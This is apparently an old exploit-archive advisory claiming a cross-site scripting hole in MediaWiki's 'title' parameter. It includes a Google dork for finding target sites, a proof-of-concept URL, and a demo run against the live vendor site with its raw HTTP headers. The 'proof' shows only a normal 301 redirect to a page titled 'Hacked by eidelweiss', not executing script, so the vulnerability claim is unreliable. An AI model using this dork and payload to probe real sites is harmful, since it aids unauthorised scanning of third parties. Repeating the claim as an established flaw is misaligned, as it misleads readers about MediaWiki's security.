Vendor: www.MEDIAWIKI.ORG
Download: http://www.mediawiki.org/wiki/Download
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Thanks: neogabriel a.k.a. Ahmed Yusuf (who gave me the inspiration for this exploit)
Dork: "powered by mediawiki" inurl:"index.php?title=" 13,200,000 results (0.18 seconds)
=====================================================================
Description:
You can read the full description of MediaWiki at www.mediawiki.org :P
=====================================================================
-=[ vuln ]=-
http://127.0.0.1/wiki/index.php?title=XSS
-=[ P0C ]=-
http://127.0.0.1/wiki/index.php?title= Hacked by eidelweiss
-=[ vendor Demo P0C ]=-
http://www.mediawiki.org/w/index.php?title= Hacked By eidelweiss
redirects to
http://www.mediawiki.org/wiki/Hacked_by_eidelweiss
Host=www.mediawiki.org
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us,en;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Status=Moved Permanently - 301
Date=Tue, 01 Jun 2010 09:11:42 GMT
Server=Apache
Cache-Control=private, s-maxage=0, max-age=0, must-revalidate
Vary=Accept-Encoding,Cookie
Last-Modified=Tue, 01 Jun 2010 09:11:42 GMT
Location=http://www.mediawiki.org/wiki/Hacked_By_eidelweiss
Content-Encoding=gzip
Content-Length=20
Content-Type=text/html; charset=utf-8
X-Cache=MISS from sq75.wikimedia.org, MISS from sq72.wikimedia.org
X-Cache-Lookup=MISS from sq75.wikimedia.org:3128, MISS from sq72.wikimedia.org:80
=========================| -=[ E0F ]=- |=========================
mateppppp